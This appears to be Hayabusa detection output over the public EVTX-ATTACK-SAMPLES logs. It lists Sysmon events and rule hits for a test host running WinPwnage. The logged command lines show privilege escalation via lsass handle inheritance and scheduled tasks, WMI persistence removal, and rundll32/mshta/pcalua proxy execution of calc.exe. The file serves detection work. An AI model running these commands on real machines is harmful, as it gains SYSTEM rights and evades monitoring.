+2019-05-12 02:58:54.887 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.903 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.981 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.028 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 365ABB72-0D5E-5CD7-0000-0010E6241700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.090 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.153 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 365ABB72-0D5E-5CD7-0000-001047331700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 03:10:42.434 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 | PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.637 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.668 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 09:32:24.461 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.227 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 365ABB72-5DEA-5CD7-0000-001077D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:35.258 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:35.352 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 365ABB72-69A3-5CD7-0000-00109D7F2200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:40.342 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 21:52:43.702 +09:00,IEWIN7,7045,info,,New Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx
+2019-05-12 22:30:32.931 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.181 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.400 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.556 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 365ABB72-2006-5CD8-0000-0010E0912300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:32:58.167 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 365ABB72-208A-5CD8-0000-0010119B2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:37.078 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:59.743 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1416 | PGUID: 365ABB72-20C7-5CD8-0000-001021022500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:37:49.604 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.523 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 365ABB72-21B8-5CD8-0000-0010E4E82600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:01.383 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:55:56.626 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.329 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.652 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:46.573 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:46.605 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:57:39.662 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:58:39.850 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 22:58:54.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 23:18:03.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-12 23:18:09.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-13 02:01:43.391 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 365ABB72-516B-5CD8-0000-001087E41600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:50.781 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:51.007 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 365ABB72-517E-5CD8-0000-00105FE01700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:20:01.980 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 365ABB72-55C1-5CD8-0000-0010970D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
